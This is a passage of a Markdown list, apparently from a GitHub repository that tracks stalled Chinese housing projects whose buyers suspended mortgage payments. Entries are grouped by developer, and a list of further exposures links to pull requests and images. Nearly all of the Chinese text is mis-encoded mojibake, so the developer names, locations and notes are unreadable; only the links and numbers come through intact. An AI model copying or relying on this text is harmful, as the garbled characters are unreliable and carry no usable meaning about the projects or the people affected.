ๅนฟ่ฅฟๅฃฎๆ—่‡ชๆฒปๅŒบ-ๅ—ๅฎๅธ‚-่“ๅ…‰้›้”ฆๆพœๆนพ,<br> ๆน–ๅŒ—็œ-่ฅ„้˜ณๅธ‚-่“ๅ…‰้›้”ฆๅ›ญ,<br> ๅฑฑไธœ็œ-้’ๅฒ›ๅธ‚-้ป„ๅฒ›่“ๅ…‰้›้”ฆๅŠๅฒ›๏ผˆ6ๆœˆ),<br> ไบ‘ๅ—็œ-ๆ˜†ๆ˜Žๅธ‚-่“ๅ…‰ๅพทๅ•†ๅคฉๅŸŸ๏ผˆ8ๆœˆ๏ผ‰ </details> <details> <summary><b> ๆณฐ็ฆพ ใ€8ใ€‘</b></summary> ๅนฟไธœ็œ-ไธญๅฑฑๅธ‚-ๆณฐ็ฆพ้‡‘ๅฐŠๅบœ,<br> ๆน–ๅŒ—็œ-ๆญฆๆฑ‰ๅธ‚-ๆณฐ็ฆพ็Ÿฅ้Ÿณๆน–้™ขๅญ๏ผˆๅ›ๆ‚ฆ่Šฑๅ›ญ๏ผ‰,<br> ๆฑŸ่‹็œ-่‹ๅทžๅธ‚-ๆณฐ็ฆพ้‡‘ๅฐŠๅบœ๏ผˆ8ๆœˆ),<br> ๆฑŸ่‹็œ-้•‡ๆฑŸๅธ‚-ๅฅๅฎนๅธ‚ๅฎๅŽ้•‡ๆณฐ็ฆพ้‡‘ๅฐŠๅบœ,<br> ๅฑฑ่ฅฟ็œ-ๅคชๅŽŸๅธ‚-ๆณฐ็ฆพ้‡‘ๅฐŠๅบœ,<br> ไธŠๆตทๅธ‚-ๅด‡ๆ˜ŽๅŒบ-ๅด‡ๆ˜Ž้•ฟๅ…ดๅฒ›ๆณฐ็ฆพๅคงๅŸŽๅฐ้™ข,<br> ไธŠๆตทๅธ‚-ๅฅ‰่ดคๅŒบ-ไธŠๆตทๅธ‚ๅฅ‰่ดคๅŒบๆณฐ็ฆพๆตทไธŠ้™ขๅญ,<br> ๆต™ๆฑŸ็œ-ๆญๅทžๅธ‚-ๅฏŒ้˜ณๅŒบๆณฐ็ฆพๅคงๅŸŽๅฐ้™ขๆฅผ็›˜ </details> <details> <summary><b> ๅคฉๆˆฟ้›†ๅ›ข ใ€1ใ€‘</b></summary> ๅคฉๆดฅๅธ‚-ๅคฉๆดฅๅŸŽๅŒบ-ๅคฉๆดฅๅคฉๆˆฟๆจพๆข…ๆฑŸไฝๅฎ… </details> <details> <summary><b> ๅคฉๅฑฑๆˆฟๅœฐไบงๅผ€ๅ‘้›†ๅ›ขๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๆฒณๅŒ—็œ-้‚ขๅฐๅธ‚-ๅคฉๅฑฑ็†™ๆน–ไบŒๆœŸ_ๅ็Ž‰ๅฎถๅ›ญ๏ผˆๅพ…ๅœ่ดท๏ผ‰ </details> <details> <summary><b> ๅคฉๆณฝ้›†ๅ›ข ใ€1ใ€‘</b></summary> ็ฆๅปบ็œ-็ฆๅทžๅธ‚-ๅคฉๆณฝๅฅฅ่Žฑๆ—ถไปฃ๏ผˆ8ๆœˆ๏ผ‰ </details> <details> <summary><b> ไธ‡็ง‘ ใ€1ใ€‘</b></summary> ๅนฟไธœ็œ-ๅนฟๅทžๅธ‚-ไธ‡็ง‘ๆตทไธŠๆ˜Žๆœˆ๏ผˆ9ๆœˆ๏ผ‰ </details> <details> <summary><b> ๅดๅทๅธ‚็›ˆๆถฆ็ฝฎไธšๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๅนฟไธœ็œ-ๆน›ๆฑŸๅธ‚-ๅดๅทๅฅฅๅ›ญๅ† ๅ†›ๅŸŽไธ€ๆœŸ </details> <details> <summary><b> ๆญฆๆฑ‰ๅฝ“ไปฃ็ง‘ๆŠ€ไบงไธš้›†ๅ›ข่‚กไปฝๆœ‰้™ๅ…ฌๅธ ใ€3ใ€‘</b></summary> ๆน–ๅŒ—็œ-ๆญฆๆฑ‰ๅธ‚-ๅฝ“ไปฃ้“ญๅฑฑ็ญ‘(ไบบ็ฆๅ›ฝ้™…ๅฅๅบทๅŸŽ)๏ผˆ7ๆœˆ๏ผ‰,<br> ้™•่ฅฟ็œ-่ฅฟๅฎ‰ๅธ‚-่ฅฟๅฎ‰ๆฒฃไธœๆ–ฐๅŸŽๅ›ๅˆๅคฉ็Žบ,<br> ๅ››ๅท็œ-ๆˆ้ƒฝๅธ‚-ๆญฆไพฏๆ–ฐๅŸŽๅฝ“ไปฃ็’ž่ช‰๏ผˆ7ๆœˆ๏ผ‰ </details> <details> <summary><b> ๆญฆๆฑ‰ๅƒ้‡Œไธฐๆˆฟๅœฐไบงๅผ€ๅ‘ๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๆน–ๅŒ—็œ-ๆญฆๆฑ‰ๅธ‚-ๆ–ฐๆดฒไธญๆ–ฐ็››ๆ™ฏ </details> <details> <summary><b> ่ฅฟๅฎ‰ๆตฉไธฐๆˆฟๅœฐไบงๅผ€ๅ‘ๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ้™•่ฅฟ็œ-่ฅฟๅฎ‰ๅธ‚-่ฅฟๅฎ‰้“ญ้ธฟไธญๅฟƒไบŒๆœŸ </details> <details> <summary><b> ่ฅฟๅฎ‰ๅไบฌๆˆฟๅœฐไบงๅผ€ๅ‘ๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ้™•่ฅฟ็œ-่ฅฟๅฎ‰ๅธ‚-่ฅฟๅฎ‰ๅไบฌ้™ขๆœ› </details> <details> <summary><b> ่ฅฟๅฎ‰ๆ›ฒๆฑŸๆ–‡ๅŒ–ไบงไธšๆŠ•่ต„๏ผˆ้›†ๅ›ข๏ผ‰ๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๆต™ๆฑŸ็œ-ๆญๅทžๅธ‚-ๆ›ฒๆฑŸๆ–ฐ้ธฅ้น็ฌฌไธ‰ๅŸŽ๏ผˆๅพ…ๅœ่ดท๏ผ‰ </details> <details> <summary><b> ่ฅฟๅฎ‰ๅŒๆˆ็ฝฎไธšๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ้™•่ฅฟ็œ-่ฅฟๅฎ‰ๅธ‚-้„ ้‚‘ๅŒบๅไป•ๅŽๅบญ </details> <details> <summary><b> ่ฅฟๅฎ‰ๅ››ๅพท็ฝฎไธšๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ้™•่ฅฟ็œ-่ฅฟๅฎ‰ๅธ‚-่ฅฟๅฎ‰็žๆกฅๅŒบๆ˜“ๅˆๅŠ๏ผˆ็›ธๅ…ณๆŠฅ้“๏ผ‰ </details> <details> <summary><b> ๆน˜ๆฝญๅธ‚่Šฑๅƒๆ ‘ๆˆฟๅœฐไบงๅผ€ๅ‘ๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๆน–ๅ—็œ-ๆน˜ๆฝญๅธ‚-ๆน˜ๅฐๅ›ฝ้™…่Šฑๅ›ญไบŒๆœŸ </details> <details> <summary><b> ๅญๆ„Ÿๆถฆ่พพๆŠ•่ต„ๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๆน–ๅŒ—็œ-ๅญๆ„Ÿๅธ‚-ๆถฆ่พพยทๅฃนๅทๅนฟๅœบ </details> <details> <summary><b> ๅไฟกๆŽง่‚ก ใ€2ใ€‘</b></summary> ๆฑŸ่‹็œ-ๆ— ้”กๅธ‚-ๅคฉๆธ้ช„ๅ›ญ,<br> ๅฑฑไธœ็œ-้’ๅฒ›ๅธ‚-่ƒถๅทžๅไฟกๅคฉ้ช„ไบ‘้บ“ </details> <details> <summary><b> ๆ–ฐๅŸŽๆŽง่‚ก ใ€1ใ€‘</b></summary> ๅŒ—ไบฌๅธ‚-็Ÿณๆ™ฏๅฑฑๅŒบ-็ฆงๆ‚ฆๅญฆๅบœ๏ผˆๆ‚ฆๅˆ›ไฝณ่‹‘๏ผ‰ </details> <details> <summary><b> ๆ–ฐๅŠ›ๅœฐไบง้›†ๅ›ขๆœ‰้™ๅ…ฌๅธ ใ€2ใ€‘</b></summary> ๆน–ๅ—็œ-้•ฟๆฒ™ๅธ‚-ๆ–ฐๅŠ›้“‚ๅ›ญ๏ผˆ8ๆœˆ๏ผ‰,<br> ๆฑŸ่ฅฟ็œ-ๅ—ๆ˜Œๅธ‚-ๆ–ฐๅŠ›ๅŸŽ </details> <details> <summary><b> ๆ–ฐๅฐš็ฝฎไธš ใ€1ใ€‘</b></summary> ๅ››ๅท็œ-ๆˆ้ƒฝๅธ‚-ๆ–ฐๅฐšๅฐš้™ข๏ผˆ10ๆœˆ๏ผ‰ </details> <details> <summary><b> ้‘ซ่‹‘ ใ€5ใ€‘</b></summary> ๆฒณๅ—็œ-้ƒ‘ๅทžๅธ‚-้‘ซ่‹‘้‡‘ๆฐด่ง‚ๅŸŽ,<br> ๆฒณๅ—็œ-้ƒ‘ๅทžๅธ‚-้‘ซ่‹‘ๅๅŸŽ3ๅท้™ขไฝๅฎ…,<br> ๆฒณๅ—็œ-้ƒ‘ๅทžๅธ‚-้ƒ‘่ฅฟ้‘ซ่‹‘ๅๅฎถๅ››ๆœŸ๏ผˆ7ๆœˆ๏ผ‰,<br> ๆฒณๅ—็œ-้ƒ‘ๅทžๅธ‚-้ƒ‘ๅทž้‘ซ่‹‘ๅ›ฝ้™…ๆ–ฐๅŸŽ,<br> ่พฝๅฎ็œ-ๅคง่ฟžๅธ‚-ๅคง่ฟžๅธ‚้‘ซๅˆ›็ง‘ๆŠ€ๅฅๅบทๅฐ้•‡๏ผˆๅŒ…ๆ‹ฌ้‘ซ่‹‘่—้พ™้ฆ–ไป˜ไธ€ๆœŸใ€ไบŒๆœŸ๏ผ‰ </details> <details> <summary><b> ้˜ณๅ…‰100 ใ€1ใ€‘</b></summary> ้™•่ฅฟ็œ-่ฅฟๅฎ‰ๅธ‚-้˜ณๅ…‰100้˜ฟๅฐ”ๅ‹’๏ผˆ8ๆœˆ๏ผ‰ </details> <details> <summary><b> ้˜ณๅ…‰ๅŸŽ้›†ๅ›ข ใ€9ใ€‘</b></summary> ้‡ๅบ†ๅธ‚-ๆธๅŒ—ๅŒบ-้˜ณๅ…‰ๅŸŽๆœชๆฅๆ‚ฆไบŒๆœŸ๏ผˆ7ๆœˆ๏ผ‰,<br> ๅนฟ่ฅฟๅฃฎๆ—่‡ชๆฒปๅŒบ-ๅ—ๅฎๅธ‚-ไบ”่ฑกๆพœๅบญๅบœๆฒ่‹‘,<br> ๅนฟ่ฅฟๅฃฎๆ—่‡ชๆฒปๅŒบ-ๅ—ๅฎๅธ‚-ไบ”่ฑกๆพœๅบญๅบœ่‡ป่‹‘,<br> ๆฒณๅ—็œ-ๅ—้˜ณๅธ‚-้˜ณๅ…‰ๅŸŽไธฝๆ™ฏ่Šฑๅ›ญ,<br> ๆฑŸ่‹็œ-ๅ—้€šๅธ‚-้˜ณๅ…‰ๅŸŽๆœชๆฅๆ‚ฆ,<br> ๆฑŸ่‹็œ-่‹ๅทžๅธ‚-้˜ณๅ…‰ๅŸŽๆช€่‹‘,<br> ๅฑฑไธœ็œ-ๆตŽๅ—ๅธ‚-้˜ณๅ…‰ๅŸŽๆช€ๆ‚ฆ,<br> ๅ››ๅท็œ-ๆˆ้ƒฝๅธ‚-้˜ณๅ…‰ๅŸŽๆœชๆฅๆ‚ฆ,<br> ๅคฉๆดฅๅธ‚-ๆดฅๅ—ๅŒบ-ๅ››ๅญฃๆ˜ฅๆ™“ </details> <details> <summary><b> ็›ŠๅŽๆˆฟๅœฐไบง ใ€1ใ€‘</b></summary> ่ดตๅทž็œ-่ดต้˜ณๅธ‚-ไธญ็Žฏๅ›ฝ้™…้˜…ๆน– </details> <details> <summary><b> ็ฆนๆดฒ้›†ๅ›ข ใ€1ใ€‘</b></summary> ๅŒ—ไบฌๅธ‚-้€šๅทžๅŒบ-็ฆนๆดฒๆœ—ๅปทๆนพ๏ผˆๆœ—ๅปท้›…่‹‘๏ผ‰ </details> <details> <summary><b> ่ฑซ้ฃž้‡ๅทฅ้›†ๅ›ขๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๆฒณๅ—็œ-ๆ–ฐไนกๅธ‚-ๆ–ฐไนกๅธ‚่ฑซ้ฃž็››ไธ–ๅŸŽ้‚ฆ๏ผˆ8ๆœˆ๏ผ‰ </details> <details> <summary><b> ่ฟœๆด‹็บขๆ˜Ÿไผไธšๅ‘ๅฑ•ๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๅฑฑ่ฅฟ็œ-ๅคชๅŽŸๅธ‚-่ฟœๆด‹็บขๆ˜Ÿๅคฉๆถฆไธ€ๆœŸ </details> <details> <summary><b> ไบ‘ๅ—ๆพ„ๅพทๆˆฟๅœฐไบงๅผ€ๅ‘ๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ไบ‘ๅ—็œ-็Ž‰ๆบชๅธ‚-ๆจฑ่Šฑ่ฐท๏ผˆ7ๆœˆ๏ผ‰ </details> <details> <summary><b> ้•ฟๆฒ™ๆถฆๆ€กๅŸŽไนกๅผ€ๅ‘ๅปบ่ฎพๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๆน–ๅ—็œ-้•ฟๆฒ™ๅธ‚-ๅฎไนกๆœชๆฅๆ–น่ˆŸ2ๆœŸ&3ๆœŸ </details> <details> <summary><b> ๆญฃ่ฃ้›†ๅ›ขๆœ‰้™ๅ…ฌๅธ ใ€2ใ€‘</b></summary> ๆน–ๅ—็œ-้•ฟๆฒ™ๅธ‚-ๆปจๆฑŸๆญฃ่ฃ็ดซ้˜™ๅฐ,<br> ้™•่ฅฟ็œ-่ฅฟๅฎ‰ๅธ‚-ๆญฃ่ฃ็ดซ้˜™ๅณฏ่‘—๏ผˆ็ดซ้˜™ๅฐไธœ่ฅฟๅŒบ๏ผ‰ </details> <details> <summary><b> ๆญฃ้˜ณๅŽฟไธญๅŽŸๅŸŽ็ฝฎไธš้›†ๅ›ขๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๆฒณๅ—็œ-้ฉป้ฉฌๅบ—ๅธ‚-ไธญๅŽŸๅŸŽ </details> <details> <summary><b> ้ƒ‘ๅทž้ป„ๆฒณๅคง่ง‚ๆœ‰้™ๅ…ฌๅธ ใ€2ใ€‘</b></summary> ๆฒณๅ—็œ-้ƒ‘ๅทžๅธ‚-็€šๆตท่ˆชๅŸŽ,<br> ๆฒณๅ—็œ-้ƒ‘ๅทžๅธ‚-็€šๆตทๆ€ๅฟตๅŸŽ </details> <details> <summary><b> ้ƒ‘ๅทžๆ–ฐๅจ้พ™็ฝฎไธšๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๆฒณๅ—็œ-้ƒ‘ๅทžๅธ‚-ๅจ้พ™ๅฐšๅ“13ๅทๆฅผ๏ผˆ10ๆœˆๅบ•ไธ‰ๆœŸ็ƒ‚ๅฐพไธ‰ๅนดๅœ่ดท๏ผ‰ </details> <details> <summary><b> ้ƒ‘ๅทžๆฐธๆ’ๆŽง่‚ก้›†ๅ›ขๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๆฒณๅ—็œ-้ƒ‘ๅทžๅธ‚-ๆฐธๆ’็†ๆƒณไธ–็•Œไธ‰ๆœŸ๏ผˆ9ๆœˆ๏ผ‰ </details> <details> <summary><b> ็ฝฎไฟก้›†ๅ›ข ใ€1ใ€‘</b></summary> ๅ››ๅท็œ-ๆˆ้ƒฝๅธ‚-็ฝฎไฟก้€ธ้ƒฝๅŸŽ๏ผˆ9ๆœˆ๏ผ‰ </details> <details> <summary><b> ไธญ้ผŽ้›†ๅ›ข ใ€3ใ€‘</b></summary> ๅนฟ่ฅฟๅฃฎๆ—่‡ชๆฒปๅŒบ-ๅ—ๅฎๅธ‚-ไธœ้ผŽ้›ๅ’Œๅบœ๏ผˆ9ๆœˆ๏ผ‰,<br> ๅนฟ่ฅฟๅฃฎๆ—่‡ชๆฒปๅŒบ-ๅ—ๅฎๅธ‚-ไธญ้ผŽๅ…ฌๅ›ญๅบœ,<br> ๅนฟ่ฅฟๅฃฎๆ—่‡ชๆฒปๅŒบ-็Ž‰ๆž—ๅธ‚-ไธญ้ผŽ็ปฟๅŸŽไธญๅฟƒ </details> <details> <summary><b> ไธญๆตทๅœฐไบง้›†ๅ›ขๆœ‰้™่ดฃไปปๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๅ››ๅท็œ-ๆˆ้ƒฝๅธ‚-ไธ‡้”ฆ็†™ๅฒธ2ๆœŸ๏ผˆ8ๆœˆ๏ผ‰ </details> <details> <summary><b> ไธญไบคๅœฐไบง่‚กไปฝๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๅŒ—ไบฌๅธ‚-ๆœ้˜ณๅŒบ-ไธŠไธœ้ƒก๏ผˆๆพœๆ‚ฆๆ™ฏ่‹‘๏ผ‰ </details> <details> <summary><b> ไธญๆถฆๆŽง่‚ก้›†ๅ›ข๏ผˆไธญๅ›ฝ๏ผ‰ๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๆต™ๆฑŸ็œ-ๆญๅทžๅธ‚-ไธญๆถฆ็’ž็Ž‰ๅ…ฌ้ฆ† </details> <details> <summary><b> ไธญๅคฉๅŸŽๆŠ•้›†ๅ›ขไนŒๅฝ“ๆˆฟๅœฐไบงๅผ€ๅ‘ๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ่ดตๅทž็œ-่ดต้˜ณๅธ‚-ไธญๅคฉยทๅพไนก </details> <details> <summary><b> ไผ—็พŽๆŠ•่ต„้›†ๅ›ขๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๆฒณๅŒ—็œ-็Ÿณๅฎถๅบ„ๅธ‚-ไผ—็พŽๅฎšๅˆถๅนฟๅœบ </details> <details> <summary><b> ๆ ชๆดฒ่ฏšๅปบๆˆฟๅœฐไบงๅผ€ๅ‘ๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๆน–ๅ—็œ-ๆ ชๆดฒๅธ‚-่ฏšๅปบๆช€้ฆ™ๅฑฑ </details> <details> <summary><b> ๆ ชๆดฒๅŽๆ™จๆˆฟๅœฐไบงๅผ€ๅ‘ๆœ‰้™่ดฃไปปๅ…ฌๅธ ใ€4ใ€‘</b></summary> ๆน–ๅ—็œ-ๆ ชๆดฒๅธ‚-ๅŽๆ™จๆ ผๆž—ๆฐดๅฒธไบŒไธ‰ๆœŸ,<br> ๆน–ๅ—็œ-ๆ ชๆดฒๅธ‚-ๅŽๆ™จ้‡‘ๆฐดๆนพไธ‰ๅ››ๆœŸ,<br> ๆน–ๅ—็œ-ๆ ชๆดฒๅธ‚-ๅŽๆ™จ็ฅžๅ†œๅบœ,<br> ๆน–ๅ—็œ-ๆ ชๆดฒๅธ‚-ๅŽๆ™จ็ฅžๅ†œๆนพ </details> <details> <summary><b> ๆ ชๆดฒๅก”ๅฑฑๆˆฟๅœฐไบงๅผ€ๅ‘ๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๆน–ๅ—็œ-ๆ ชๆดฒๅธ‚-ไธœๆˆไธญๅฟƒ1ๆ ‹ </details> <details> <summary><b> ้ฉป้ฉฌๅบ—ๅธ‚ๆ™ฏๅฎœ็ฝฎไธšๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๆฒณๅ—็œ-้ฉป้ฉฌๅบ—ๅธ‚-้‚ๅนณๅŽฟ็ปฟๅœฐ่‹‘ </details> <details> <summary><b> ๅบ„ๅ’Œ้›†ๅ›ข ใ€1ใ€‘</b></summary> ๆฑŸ่ฅฟ็œ-่ไนกๅธ‚-ๅบ„ๅ’ŒไธญๅคฎๅŽๅบœ๏ผˆ10ๆœˆ๏ผ‰ </details> ## ๅ…ถไป–ๆ›ๅ…‰ - ๅฑฑไธœ-้’ๅฒ›-้ป„ๅฒ›่žๅ‘็ขงๆก‚ๅ›ญ็ ๅฑฑ้ƒก ไปฅ็–ซๆƒ…ไธบ็†็”ฑๅปถๆœŸไบคๆˆฟ ็›ฎๅ‰ไป…ๅ‡ ไธชๅทฅไบบๅœจ็ฃจๆด‹ๅทฅ - ๆขๆบชๆœฌๆบ(ๅŸบๆœฌๅœๅทฅ), ๅไฟกๅŸŽ็ซ‹ๆ–น(ๅœๅทฅไธ€ๅนดๅคš),ๆ–ฐๅŠ›็ฟก็ฟ ๆนพ, ๆขๆบชๅฎ˜้‚ธ(ๅœๅทฅๅŠๅนด)๏ผŒ่ง๏ผš[#900](https://github.com/WeNeedHome/SummaryOfLoanSuspension/pull/900) - ๅ››ๅท็œ-้ƒฝๆฑŸๅ ฐๅธ‚-ๆ’ๅคงไบ‘้”ฆๅŽๅบญ๏ผˆ9ๆœˆ๏ผ‰๏ผˆ็ผบๅ‘Š็Ÿฅไนฆ๏ผ‰ - ๆฒณๅŒ—-้‚ขๅฐ-็š“้กบๅฃนๅท้™ข๏ผŒ่ง๏ผš[#940](https://github.com/WeNeedHome/SummaryOfLoanSuspension/pull/940) - [่ดตๅทžไธญๅคฉๆœชๆฅๆ–น่ˆŸ็Žฏ็ƒ่ฐทC1็ป„ๅ›ข็ƒ‚ๅฐพ](others/ไธญๅคฉๆœชๆฅๆ–น่ˆŸ็Žฏ็ƒ่ฐทC1็ป„ๅ›ข.jpeg) ๏ผŒ่ฟ™ๆฅผ็›˜ๅœๅทฅไธคๅนดไบ†๏ผŒไธญๅคฉๅŸŽๆŠ•ๅทฒ็ป่ขซๆŽฅ็ฎก๏ผŒ5ๆœˆไปฝๅปบไบ†็พคๅ’Œไธšไธปๅ่ฐƒ๏ผŒๅบ”่ฏฅๆ˜ฏๆฒกๅ‘Š็Ÿฅไนฆ็š„ไบ†๏ผŒhttp://sc.house.hexun.com/News/details/id/198910.html ใ€‚ๅ…ทไฝ“่ง๏ผš[#828](https://github.com/WeNeedHome/SummaryOfLoanSuspension/pull/828) - [ๆน–ๅŒ—็œๆ’ๅคงไพ›ๅบ”ๅ•†ใ€ๅฐๅพฎไผไธšๆ–ญ่ดทๅœๅทฅๅ‘Š็Ÿฅไนฆ](others/ๆน–ๅŒ—็œๆ’ๅคงไพ›ๅบ”ๅ•†ใ€ๅฐๅพฎไผไธšๆ–ญ่ดทๅœๅทฅๅ‘Š็Ÿฅไนฆ.png) - ๆน–ๅŒ—็œๆ’ๅคง็ง‘ๆŠ€ๆ—…ๆธธๅŸŽ5ๅทๅœฐๅ—้€พๆœŸไธ€ๅนดๆœชไบคไป˜๏ผŒๆ”ฟๅบœไธ“็ญ็ญ”ๅบ”8/10ไบคไป˜ 2ๆ ‹ๆฅผ๏ผŒๅคฑไฟกใ€‚ๆ•ดไธช5ๅทๅœฐๅ—้ข„ไผฐ่ฏด11ๆœˆไบคไป˜ - ่ตฃๆฆ†ๅŒบ้ฆ™ๆธฏๅŸŽใ€ๅŽไธญ้ƒกๅบœ็ญ‰๏ผš่ฟ™ไบ›็›˜ๅทฒๆœ‰ๅๅนดไปฅไธŠๅŽ†ๅฒ๏ผŒไธ็Ÿฅ้“็›ธๅ…ณไธšไธปๅˆฉ็›Šๆ˜ฏๅฆ่งฃๅ†ณ๏ผŒๅ› ๆญคๅ€ŸๆญคๆœบไผšไนŸๆ”พไธŠๆฅใ€‚ๅ…ทไฝ“่ง๏ผš[ๅคงๅฎถๆฅ่ฏด่ฏด่ตฃๆฆ†็š„็ƒ‚ๅฐพๆฅผ_่ตฃๆฆ†ๅง_็™พๅบฆ่ดดๅง.pdf](others/ใ€ๅ›พ็‰‡ใ€‘ๅคงๅฎถๆฅ่ฏด่ฏด่ตฃๆฆ†็š„็ƒ‚ๅฐพๆฅผ_่ตฃๆฆ†ๅง_็™พๅบฆ่ดดๅง.pdf) ใ€‚ๅ‚่€ƒๆฅๆบ๏ผšhttps://tieba.baidu.com/p/4710142504 - ๆฒณๅ—็œ-ๅ•†ไธ˜ๅธ‚-้ธฟๅฑฑ็พŽๆ™ฏ [ๅ›พ](https://user-images.githubusercontent.com/110381329/182118827-41b3e82a-0201-4254-8025-6ee729dcb23f.PNG) - ๆฒณๅŒ—็œ-้‚ฏ้ƒธๅธ‚-ๅŒ—ๆน–ๅฐšๆฐดๆนพ [#65](https://github.com/WeNeedHome/SummaryOfLoanSuspension/pull/65) - ๆฒณๅŒ—็œ-ไธ‰ๆฒณๅธ‚-ๅคฉๆด‹ๅŸŽๅŒๅฟƒๅœ†๏ผŒๆฐดๅฒธ่Šฑ่ฏญ๏ผŒ็™พไธ–้‡‘่ฐทไบงไธšๅŸบๅœฐไบŒๆœŸ 3ไธช็ƒ‚ๅฐพๅฐๅŒบ [#110](https://github.com/WeNeedHome/SummaryOfLoanSuspension/pull/110) - ๆน–ๅŒ—็œ-้ป„็Ÿณๅธ‚-้ป„็Ÿณๅนฟๅœบ๏ผŒๅผ€ๅ‘ๅ•†ๅทฒ็ ดไบง๏ผ [#134](https://github.com/WeNeedHome/SummaryOfLoanSuspension/pull/134) [ๅ›พไธ€](https://raw.githubusercontent.com/WeNeedHome/SummaryOfLoanSuspension/c798e3a792f58be11a522e1f024777e5cf27c56c/images/%E9%BB%84%E7%9F%B3%E5%B8%82%E9%BB%84%E7%9F%B3%E5%B9%BF%E5%9C%BA%E5%BC%80%E5%8F%91%E5%95%86%E7%A0%B4%E4%BA%A7%E7%83%82%E5%B0%BE%E5%9B%BE%E4%B8%80.png) [ๅ›พไบŒ](https://raw.githubusercontent.com/WeNeedHome/SummaryOfLoanSuspension/c798e3a792f58be11a522e1f024777e5cf27c56c/images/%E9%BB%84%E7%9F%B3%E5%B8%82%E9%BB%84%E7%9F%B3%E5%B9%BF%E5%9C%BA%E5%BC%80%E5%8F%91%E5%95%86%E7%A0%B4%E4%BA%A7%E7%83%82%E5%B0%BE%E5%9B%BE%E4%BA%8C.png) - ๆฒณๅŒ—็œ-ไฟๅฎšๅธ‚-ๆถžๆฐดๆ–ฐๅŸŽๅŽ้“ถๅŸŽไบบๆ‰ๅฎถๅ›ญ [#159](https://github.com/WeNeedHome/SummaryOfLoanSuspension/pull/159) - ๅคฉๆดฅๅธ‚-[ๅ—ๅผ€ๅŒบๅ‡Œๅฎพ่ทฏๅœฐ้“Bๅฃ่ฅฟไพง-่žๅˆ›ๅฎธ้™ข๏ผˆๅŽๅทๅ›ญ๏ผ‰](https://raw.githubusercontent.com/WeNeedHome/SummaryOfLoanSuspension/53d4a3fd467974d86d727ff3151132c67b4e8493/images/%E5%8D%97%E5%BC%80%E5%8C%BA%E8%9E%8D%E5%88%9B%E5%AE%B8%E9%99%A2.jpg)๏ผŒ[่ฅฟ้’ๅŒบๆดฅๅŒๅ…ฌ่ทฏไธŽๅญ็‰™ๆกฅไบคๅฃ-่“ๅ…‰้›็ปตๅŠๅฒ›](https://raw.githubusercontent.com/WeNeedHome/SummaryOfLoanSuspension/53d4a3fd467974d86d727ff3151132c67b4e8493/images/%E8%A5%BF%E9%9D%92%E5%8C%BA%E9%9B%8D%E7%BB%B5%E5%8D%8A%E5%B2%9B.jpg) ไธคไธช็ƒ‚ๅฐพๆฅผ [#161](https://github.com/WeNeedHome/SummaryOfLoanSuspension/pull/161) - ๆฒณๅ—็œ-่ฎธๆ˜Œๅธ‚-้“‚ๆ‚ฆๅฑฑ๏ผŒๅšๆž—้ฆ–ๅบœ๏ผŒๆ’ๅคงๆ‚ฆ้พ™ๅฐ 3ไธชๅœๅทฅๆฅผ็›˜ [#234](https://github.com/WeNeedHome/SummaryOfLoanSuspension/pull/234) - ๆฒณๅ—็œ-ไธ‰้—จๅณกๅธ‚-่ˆช็ง‘ๅŸŽ๏ผŒๅผ€้˜ณ็››ไธ–๏ผŒไธญๆตทๅ›ฝ้™…๏ผŒๆ˜ฅๅคฉๅŸŽ 4ไธช็ƒ‚ๅฐพ้กน็›ฎ [#261](https://github.com/WeNeedHome/SummaryOfLoanSuspension/pull/261) - ้™•่ฅฟ็œ-่ฅฟๅฎ‰ๅธ‚-่ดž่ง‚้ฆ–ๅบœ [#262](https://github.com/WeNeedHome/SummaryOfLoanSuspension/pull/262) - ๆน–ๅŒ—็œ-ๅฎœๆ˜Œๅธ‚-ๅฎœๆ˜Œๅคท้™ตๅŒบๆ’ๅคงๅ้ƒฝไบŒๆœŸ๏ผˆ2021.8ๅœๅทฅ๏ผ‰[#269](https://github.com/WeNeedHome/SummaryOfLoanSuspension/pull/269) - ไบ‘ๅ—็œ-ๆ˜†ๆ˜Žๅธ‚-ๆฐธ้‘ซๅ“ˆๅผ—ไธญๅฟƒ๏ผˆ9ๆœˆ๏ผ‰๏ผŒ้”ฆ่‰บๆ˜†ๆ˜Žไน‹ๅ…‰๏ผˆ10ๆœˆ๏ผ‰๏ผˆ็ผบๅ‘Š็Ÿฅไนฆ๏ผ‰ [#272](https://github.com/WeNeedHome/SummaryOfLoanSuspension/pull/272) - ๆน–ๅŒ—็œ-ๅญๆ„Ÿๅธ‚-ไบ‘ๆขฆๅŽฟ่กๆณฝๆ–ฐ้ƒฝ [#274](https://github.com/WeNeedHome/SummaryOfLoanSuspension/pull/274) - ๆฑŸ่‹็œ-ๆ‰ฌๅทžๅธ‚-ๆฑŸ้ƒฝๅŒบ้‡‘ๅฅฅๆ–‡ๆ˜Œๅ…ฌ้ฆ† ๅผ€ๅ‘ๅ•†็ 